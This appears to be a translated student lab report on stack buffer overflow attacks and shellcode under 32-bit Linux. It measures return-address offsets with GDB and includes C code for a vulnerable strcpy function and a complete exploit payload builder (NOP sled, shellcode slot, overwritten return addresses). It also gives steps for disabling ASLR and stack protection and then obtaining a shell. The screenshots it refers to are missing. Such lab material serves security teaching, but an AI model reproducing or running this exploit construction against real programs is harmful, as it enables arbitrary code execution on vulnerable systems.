Buffer overflow attack and Shellcode under Linux

Source: Internet
Author: User

4.3.2 The return address of a function in the Linux32 environment

Compile, link and run buffer_overflow.c with the Linux stack protection mechanism turned off:


Debug the program with GDB below:

Set breakpoints at the entry of the Foo function, at the call to strcpy, and at the return from Foo:

Continue running and locate the return address of the function:

The offset from the start address b of buff to the saved return address a of Foo is:

a - b = 0xbffff29c - 0xbffff280 = 0x1c = 16 + 12 = 28

Therefore, if the input string (Lbuffer) copied into buff is longer than 28 bytes, a buffer overflow occurs, and the four bytes "ABCD" at offset 28 of the input overwrite the memory at 0xbffff29c; that is, the saved return address of Foo becomes "ABCD", which the CPU reads as the little-endian value 0x44434241.


Because the address 0x44434241 is not mapped, the program crashes with a segmentation fault when Foo returns.
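The pattern described in this section, as an added example in C that is not the buffer_overflow.c used above (that file is not reproduced on this page): the vulnerable Foo, a 16-byte stack buffer filled by strcpy with no length check, next to a bounds-checked version, plus a builder for the input whose bytes 28..31 are "ABCD". The buffer size of 16 is an assumption read off the 0x1c = 16 + 12 arithmetic; the 12 bytes between the end of buff and the saved return address (padding plus saved EBP) depend on the compiler's frame layout, so the 28 is only the value measured in this page's GDB session.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Assumed reconstruction of the Foo pattern the text describes: a 16-byte
 * stack buffer filled with strcpy and no length check.  Only the size of
 * buff (16) is taken from the 0x1c = 16 + 12 arithmetic above.
 */
void foo_vulnerable(const char *input)
{
    char buff[16];
    strcpy(buff, input);        /* writes past buff for any input of 16+ bytes */
    printf("%s\n", buff);
}

/*
 * Hardened form: refuse input that does not fit, copy an exact byte count.
 * Returns the number of bytes copied, or -1 when the input would overflow.
 */
int foo_safe(const char *input)
{
    char buff[16];
    size_t len = strlen(input);
    if (len >= sizeof buff)     /* the terminator needs room too */
        return -1;
    memcpy(buff, input, len + 1);
    return (int)len;
}

/* Decode 4 bytes the way a little-endian x86 CPU loads a saved return address. */
uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Input of the shape used above: `offset` filler bytes, then a 4-byte marker. */
char marker_input[64];

size_t build_marker_input(size_t offset, const char marker[4])
{
    if (offset + 4 >= sizeof marker_input)
        return 0;
    memset(marker_input, 'X', offset);          /* filler covers padding and saved EBP */
    memcpy(marker_input + offset, marker, 4);   /* lands on the saved return address */
    marker_input[offset + 4] = '\0';
    return offset + 4;
}

int main(void)
{
    foo_vulnerable("short");                    /* 6 bytes: fits, nothing corrupted */
    printf("foo_safe(\"hello\") = %d\n", foo_safe("hello"));

    size_t n = build_marker_input(28, "ABCD");
    printf("input length %zu, dword at offset 28 = 0x%08x\n",
           n, le32((const unsigned char *)marker_input + 28));
    /* foo_vulnerable(marker_input) would return to 0x44434241 and crash, as in 4.3.2 */
    return 0;
}
```

The two numbers the page reads at its breakpoints come from `info frame` (which prints "saved eip at ADDR") and `p &buff` while stopped inside Foo; their difference is the offset. Note that an input which overruns buff by fewer than 12 bytes never reaches the return address: it clobbers padding and the saved EBP, so the failure, if any, shows up only after Foo returns, in the caller's epilogue.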

4.3.3 Writing shellcode in the Linux32 environment

Compile, link and run shell_asm_fix_opcode.c; a shell is obtained through the buffer overflow:


4.4 Doing the experiment and writing the experiment report

Before the file is modified:

To find out what is happening with the overflow, debug with GDB:

Because Lvictim did not overflow as given, for convenience in debugging I changed buffer[512] in the teacher's source code to buffer[500]:


Recompile and run; a segmentation fault occurs:


Next, use GDB to find the memory location of the return address of the SMASH_LARGEBUF function and its distance from the start address of the buffer.

First disassemble the SMASH_LARGEBUF function:



Then set three breakpoints:


Start the process and obtain the return address of the function, 0xbffff35c:


Continue to the next breakpoint: the start address of the buffer is 0xbffff158, and that pointer is stored at 0xbfffed30:


So:

0xbffff35c - 0xbffff158 = 0x204 = 516

off_set=516

buffer_address can be set to any value in a range starting from 0xbffff158

The following changes are required in the exploit program (buffer_address and off_set set to the values found above):
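The exploit-side construction those changes feed, as an added example in C that is neither the teacher's program nor the one in the screenshots: buffer_address = 0xbffff158 and off_set = 516 are the values found in GDB above; the target address 0xbffff158 + 128, the payload size of off_set + 8 and the eight-byte int3 stand-in for the shellcode from shell_asm_fix_opcode.c (which is not on this page) are assumptions. The payload is laid out as a NOP sled, the shellcode, then repeated copies of the return address, aligned so that one copy lands exactly on the saved return address at off_set.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUFFER_ADDRESS 0xbffff158u            /* start of buffer, read in the GDB session */
#define OFF_SET        516                    /* buffer start -> saved return address */
#define PAYLOAD_SIZE   (OFF_SET + 8)          /* reach past the return address */
#define DEMO_RET       (BUFFER_ADDRESS + 128) /* assumed target inside the NOP sled */

/*
 * Constructed stand-in for the real shellcode: eight int3 (0xcc) instructions.
 * If the overwritten return address really lands in the sled, the victim dies
 * with SIGTRAP instead of SIGSEGV, which proves control of EIP before any real
 * shellcode goes in.  Like usable shellcode it contains no 0x00 byte.
 */
const unsigned char int3_stub[8] = { 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc };

unsigned char demo_payload[PAYLOAD_SIZE + 1];

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Lay out [NOP sled][shellcode][NOP pad][ret_addr ret_addr ...] in out, with
 * one copy of ret_addr exactly at off_set so it replaces the saved return
 * address.  Returns size on success, 0 if the pieces do not fit.  out must
 * have room for size + 1 bytes (the terminating NUL that strcpy stops at).
 */
size_t build_exploit(unsigned char *out, size_t size, size_t off_set, uint32_t ret_addr,
                     const unsigned char *sc, size_t sc_len)
{
    if (size < off_set + 4 || sc_len + 4 > off_set)
        return 0;
    size_t sled_len = (off_set - sc_len) / 2;       /* shellcode in the middle, sled before it */
    memset(out, 0x90, sled_len);
    memcpy(out + sled_len, sc, sc_len);
    size_t sc_end = sled_len + sc_len;
    size_t first = sc_end + (off_set - sc_end) % 4; /* align so a copy hits off_set exactly */
    memset(out + sc_end, 0x90, first - sc_end);
    size_t i;
    for (i = first; i + 4 <= size; i += 4)
        put_le32(out + i, ret_addr);
    memset(out + i, 0x90, size - i);                /* tail shorter than 4 bytes, if any */
    out[size] = '\0';
    return size;
}

/* Checks to run before firing: right dword at off_set, and no NUL byte that would cut the copy short. */
int layout_ok(const unsigned char *p, size_t size, size_t off_set, uint32_t ret_addr)
{
    return get_le32(p + off_set) == ret_addr && memchr(p, 0, size) == NULL;
}

size_t build_demo(void)
{
    return build_exploit(demo_payload, PAYLOAD_SIZE, OFF_SET, DEMO_RET,
                         int3_stub, sizeof int3_stub);
}

int main(void)
{
    size_t n = build_demo();
    if (n == 0 || !layout_ok(demo_payload, n, OFF_SET, DEMO_RET)) {
        fprintf(stderr, "payload does not fit or contains a NUL byte\n");
        return 1;
    }
    printf("payload %zu bytes, ret 0x%08x at offset %d, NOP sled of %zu bytes\n",
           n, (unsigned)DEMO_RET, OFF_SET, (OFF_SET - sizeof int3_stub) / 2);
    /* Deliver it however Lvictim reads its input; for an argv[1] victim:
       execl("./Lvictim", "Lvictim", (char *)demo_payload, (char *)NULL); */
    return 0;
}
```

The address seen under GDB shifts in a bare run because GDB adds environment variables (LINES, COLUMNS) to the inferior, which moves the stack; the NOP sled absorbs that shift, which is why the page says buffer_address is a range rather than one value. Address space randomization must be off (`/proc/sys/kernel/randomize_va_space` set to 0 as root) and Lvictim must be a 32-bit build with the stack protector and the non-executable stack disabled, as in 4.3.2, or the copy at off_set is never reached as a return address. Once the int3 stand-in produces a SIGTRAP, swap in the real shellcode; keep the `layout_ok` check, since a single 0x00 byte in it truncates the strcpy before the return address is overwritten.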


Now run the attack against Lvictim and obtain a shell; note that address space randomization must be turned off first:


As you can see, the shell has been obtained and the experiment has succeeded.

Finish
